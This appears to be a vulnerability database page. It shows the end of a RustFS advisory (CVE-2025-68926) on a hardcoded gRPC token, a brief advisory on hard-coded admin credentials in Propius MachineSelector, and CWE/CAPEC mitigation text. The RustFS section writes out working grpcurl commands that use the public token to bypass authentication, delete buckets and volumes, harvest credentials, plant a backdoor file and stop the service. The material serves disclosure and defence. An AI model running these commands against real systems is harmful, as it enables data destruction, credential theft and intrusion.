Authentication is properly enforced - unauthorized requests are rejected.\n\n---\n\n### Step 2: Extract Hardcoded Token from Source Code\n\n**Public Source Code Analysis**:\n\n```bash\n$ git clone https://github.com/rustfs/rustfs.git\n$ cd rustfs\n$ grep -rn \u0027\"rustfs rpc\"\u0027 --include=\u0027*.rs\u0027\n```\n\n**Result**: \u2705 Token found in public source code\n\n```\nrustfs/src/server/http.rs:680: let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap();\ncrates/protos/src/lib.rs:153: let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?;\n```\n\n**Extracted Token**: `rustfs rpc`\n\n---\n\n### Step 3: Exploit - Authenticate Using Hardcoded Token\n\n**Test 3.1: Successful authentication with hardcoded token**\n\n```bash\n$ grpcurl -plaintext \\\n -H \u0027authorization: rustfs rpc\u0027 \\\n -import-path /private/tmp/rustfs/crates/protos/src \\\n -proto node.proto \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/Ping\n```\n\n**Result**: \ud83d\udd13 **AUTHENTICATION BYPASSED**\n\n```json\n{\n \"version\": \"1\",\n \"body\": \"DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==\"\n}\n```\n\n**Analysis**: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.\n\n---\n\n### Step 4: Demonstrate Access to Sensitive Management APIs\n\n**Test 4.1: Server Configuration Disclosure**\n\n```bash\n$ grpcurl -plaintext \\\n -H \u0027authorization: rustfs rpc\u0027 \\\n -import-path /private/tmp/rustfs/crates/protos/src \\\n -proto node.proto \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/ServerInfo\n```\n\n**Result**: \u2705 **Complete server configuration disclosed**\n\n```json\n{\n \"success\": true,\n \"serverProperties\": \"n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=\"\n}\n```\n\n**Analysis**:\n- Server returned complete configuration including storage paths, endpoint addresses, version info\n- Binary data contains sensitive internal state (MessagePack encoded)\n- Information disclosure confirmed\n\n**Test 4.2: Disk Information Access**\n\n```bash\n$ grpcurl -plaintext \\\n -H \u0027authorization: rustfs rpc\u0027 \\\n -import-path /private/tmp/rustfs/crates/protos/src \\\n -proto node.proto \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/DiskInfo\n```\n\n**Result**: \u2705 **Authenticated request accepted** (business logic error returned, not auth error)\n\n```json\n{\n \"error\": {\n \"code\": 36,\n \"errorInfo\": \"io error can not find disk\"\n }\n}\n```\n\n**Analysis**:\n- Request passed authentication (error is business logic, not authentication)\n- Proves attacker has authenticated access to sensitive system information APIs\n\n---\n\n## Impact Analysis\n\n### Affected APIs\n\nAll 50+ gRPC methods in `node_service.NodeService` are vulnerable:\n\n#### \ud83d\udd34 **CRITICAL Impact - Data Destruction**\n- `DeleteBucket` - Delete production buckets\n- `DeleteVolume` - Destroy entire storage volumes\n- `DeleteUser` - Remove legitimate users\n- `DeletePolicy` - Remove access control policies\n- `DeleteServiceAccount` - Remove service accounts\n\n#### \ud83d\udd34 **CRITICAL Impact - Configuration Manipulation**\n- `ReloadSiteReplicationConfig` - Corrupt cluster replication\n- `SignalService` - Control service lifecycle\n- `LoadPolicy` - Modify access control policies\n- `LoadPolicyMapping` - Alter policy assignments\n\n#### \ud83d\udfe0 **HIGH Impact - Unauthorized Data Access/Modification**\n- `ReadAll` / `ReadAt` - Read arbitrary data\n- `WriteAll` / `WriteStream` - Inject malicious data\n- `RenameFile` / `RenameData` - Manipulate file system\n- `UpdateMetadata` / `WriteMetadata` - Corrupt metadata\n\n#### \ud83d\udfe0 **HIGH Impact - Privilege Escalation**\n- `LoadUser` - Access user credentials\n- `LoadServiceAccount` - Access service credentials\n- `LoadGroup` - Access group memberships\n\n#### \ud83d\udfe1 **MEDIUM Impact - Information Disclosure**\n- `ServerInfo` - Server configuration disclosure\n- `DiskInfo` - Storage configuration disclosure\n- `GetMetrics` - Performance metrics disclosure\n- `GetBucketStats` - Bucket statistics disclosure\n- `LocalStorageInfo` - Storage system information\n- `ListBucket` - Bucket enumeration\n\n#### \ud83d\udfe1 **MEDIUM Impact - Cluster Operations**\n- `MakeBucket` - Unauthorized bucket creation\n- `HealBucket` - Trigger repair operations\n- `BackgroundHealStatus` - Monitor internal operations\n\n### Attack Scenarios\n\n#### Scenario 1: Data Destruction\n\n```bash\n# Enumerate all buckets\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"options\": \"{}\"}\u0027 \\\n localhost:9000 node_service.NodeService/ListBucket\n\n# Delete critical production bucket\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"bucket\": \"production-data\"}\u0027 \\\n localhost:9000 node_service.NodeService/DeleteBucket\n\n# Delete entire storage volume\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"volume\": \"vol1\"}\u0027 \\\n localhost:9000 node_service.NodeService/DeleteVolume\n```\n\n**Impact**: Complete data loss, business disruption\n\n#### Scenario 2: Credential Harvesting\n\n```bash\n# Extract user credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"access_key\": \"admin\"}\u0027 \\\n localhost:9000 node_service.NodeService/LoadUser\n\n# Extract service account credentials\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"access_key\": \"service-account\"}\u0027 \\\n localhost:9000 node_service.NodeService/LoadServiceAccount\n\n# Exfiltrate IAM policies\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"name\": \"admin-policy\"}\u0027 \\\n localhost:9000 node_service.NodeService/LoadPolicy\n```\n\n**Impact**: Complete IAM compromise, lateral movement\n\n#### Scenario 3: Backdoor Installation\n\n```bash\n# Inject malicious data into system paths\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"volume\": \"config\", \"path\": \"backdoor.sh\", \"buf\": \"...\"}\u0027 \\\n localhost:9000 node_service.NodeService/WriteAll\n\n# Modify system configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"bucket\": \"system\", \"path\": \".rustfs.sys/config.json\", \"fi\": \"...\"}\u0027 \\\n localhost:9000 node_service.NodeService/WriteMetadata\n```\n\n**Impact**: Persistent compromise, further exploitation\n\n#### Scenario 4: Cluster Disruption\n\n```bash\n# Corrupt replication configuration\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig\n\n# Force service restart/shutdown\ngrpcurl -plaintext -H \u0027authorization: rustfs rpc\u0027 \\\n -d \u0027{\"sig\": 2}\u0027 \\\n localhost:9000 node_service.NodeService/SignalService\n```\n\n**Impact**: Distributed system failure, data inconsistency\n\n---\n\n## Exploitation Preconditions\n\n### Required Conditions\n\n\u2705 **All conditions typically met in production deployments**:\n\n1. **Network Access**: Attacker can reach gRPC port (9000/TCP)\n - RustFS binds to `0.0.0.0` by default (all interfaces)\n - Commonly exposed for distributed node communication\n\n2. **Token Knowledge**: Token is publicly known\n - Available in public GitHub repository\n - Identical across all RustFS installations\n - Cannot be changed without code modification\n\n3. **No Additional Security Controls**:\n - No mTLS/certificate-based authentication\n - No IP whitelisting (typically)\n - No VPN/network segmentation requirements\n - No rate limiting on authentication attempts\n\n### Attack Complexity\n\n**Complexity**: \ud83d\udfe2 **TRIVIAL**\n\n- Single `grpcurl` command with hardcoded token\n- No exploit development required\n- No timing or race conditions\n- No target-specific reconnaissance needed\n- Fully automatable\n- Works against any RustFS instance\n\n**Time to Exploit**: \u003c 1 minute\n\n---\n\n## Security Impact\n\n### Confidentiality Impact: HIGH\n\n- **Complete Data Disclosure**: All stored objects readable via `ReadAll`/`ReadAt`\n- **Credential Exposure**: IAM users, service accounts, policies accessible\n- **Configuration Disclosure**: Server, storage, cluster configuration leaked\n- **Metrics Exposure**: Performance and usage metrics accessible\n\n### Integrity Impact: HIGH\n\n- **Data Modification**: Arbitrary data injection via `WriteAll`/`WriteStream`\n- **Metadata Corruption**: File metadata tampering via `WriteMetadata`\n- **Policy Manipulation**: IAM policies modifiable via `LoadPolicy`\n- **Configuration Changes**: Cluster replication config alterable\n\n### Availability Impact: HIGH\n\n- **Data Destruction**: Buckets/volumes deletable via `DeleteBucket`/`DeleteVolume`\n- **Service Disruption**: Service controllable via `SignalService`\n- **Cluster Degradation**: Replication corruption via `ReloadSiteReplicationConfig`\n- **Resource Exhaustion**: Arbitrary data writes, bucket creation\n\n---\n\n## Compliance \u0026 Regulatory Impact\n\n### Standards Violated\n\n#### PCI-DSS v4.0\n- **Requirement 6.5.3**: Broken authentication\n- **Requirement 8.2**: Strong authentication required\n- **Requirement 8.6**: Multi-factor authentication required\n\n#### OWASP Top 10 2021\n- **A07:2021 - Identification and Authentication Failures**\n - Use of hard-coded credentials\n - Missing or ineffective authentication\n\n#### CWE (Common Weakness Enumeration)\n- **CWE-798**: Use of Hard-coded Credentials (Rank: 37/400)\n- **CWE-1391**: Use of Weak Credentials\n- **CWE-287**: Improper Authentication\n\n#### NIST Cybersecurity Framework\n- **PR.AC-1**: Access control mechanisms violated\n- **PR.AC-7**: Authentication mechanisms insufficient\n\n#### SOC 2 Type II\n- **CC6.1**: Logical access controls inadequate\n- **CC6.6**: Credential management controls missing\n\n### Legal \u0026 Business Impact\n\n- **Data Breach Notification**: GDPR Art. 33, CCPA \u00a71798.150\n- **Regulatory Fines**: GDPR up to \u20ac20M or 4% annual revenue\n- **Customer Trust**: Severe reputational damage\n- **Service Disruption**: SLA violations, customer compensation\n- **Incident Response Costs**: Forensics, remediation, legal fees\n\n---\n\n## Proof of Concept\n\n### Automated POC Script\n\n**File**: `audit_analysis/poc_cve_2025_008_grpc_token_working.sh`\n\n**Usage**:\n```bash\nchmod +x poc_cve_2025_008_grpc_token_working.sh\n./poc_cve_2025_008_grpc_token_working.sh [target_host:port]\n```\n\n**Default Target**: `localhost:9000`\n\n### POC Features\n\n1. \u2705 **Baseline Authentication Testing**\n - Verifies unauthenticated requests are rejected\n - Verifies incorrect tokens are rejected\n\n2. \u2705 **Exploit Demonstration**\n - Authenticates using hardcoded token\n - Calls `Ping` service successfully\n\n3. \u2705 **Sensitive API Access**\n - Accesses `ServerInfo` (configuration disclosure)\n - Accesses `DiskInfo` (system information)\n - Demonstrates authenticated access to management APIs\n\n4. \u2705 **Detailed Reporting**\n - Displays vulnerable code locations\n - Lists all affected APIs (50+ methods)\n - Provides CVSS scoring and impact analysis\n - Includes remediation recommendations\n\n### POC Output Summary\n\n```\n[PHASE 1] Baseline Testing\n \u2713 Without token: REJECTED (Unauthenticated)\n \u2713 With wrong token: REJECTED (Unauthenticated)\n\n[PHASE 2] Exploit\n \u2713 With hardcoded token \"rustfs rpc\": ACCEPTED \u2705\n\n[PHASE 3] Sensitive API Access\n \u2713 ServerInfo: SUCCESS - Configuration disclosed\n \u2713 DiskInfo: SUCCESS - System information accessible\n\n[RESULT] VULNERABILITY CONFIRMED\n```\n\n## Acknowledgements\n\nWe would like to thank **bilisheep** from the **Xmirror Security Team** for discovering and responsibly reporting this vulnerability.",
"id": "GHSA-h956-rh7x-ppgj",
"modified": "2026-01-07T15:22:21Z",
"published": "2025-12-30T23:06:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68926"
},
{
"type": "PACKAGE",
"url": "https://github.com/rustfs/rustfs"
},
{
"type": "WEB",
"url": "https://github.com/rustfs/rustfs/releases/tag/1.0.0-alpha.78"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "RustFS has a gRPC Hardcoded Token Authentication Bypass"
}
GHSA-H967-RJC9-W27M
Vulnerability from github – Published: 2023-03-14 21:30 – Updated: 2023-03-20 21:30A Hard Coded Admin Credentials issue in the Web-UI Admin Panel in Propius MachineSelector 6.6.0 and 6.6.1 allows remote attackers to gain access to the admin panel Propiusadmin.php, which allows taking control of the affected system.
{
"affected": [],
"aliases": [
"CVE-2023-26511"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-14T21:15:00Z",
"severity": "CRITICAL"
},
"details": "A Hard Coded Admin Credentials issue in the Web-UI Admin Panel in Propius MachineSelector 6.6.0 and 6.6.1 allows remote attackers to gain access to the admin panel Propiusadmin.php, which allows taking control of the affected system.",
"id": "GHSA-h967-rjc9-w27m",
"modified": "2023-03-20T21:30:17Z",
"published": "2023-03-14T21:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26511"
},
{
"type": "WEB",
"url": "https://www.propius.de/ms_security.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].
- In Windows environments, the Encrypted File System (EFS) may provide some protection.
Mitigation
For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key.
Mitigation
If the product must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection.
Mitigation
- For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.
- Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method.
Mitigation
- For front-end to back-end connections: Three solutions are possible, although none are complete.
- The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.
- Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.
- Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks.
CAPEC-191: Read Sensitive Constants Within an Executable
An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.
CAPEC-70: Try Common or Default Usernames and Passwords
An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.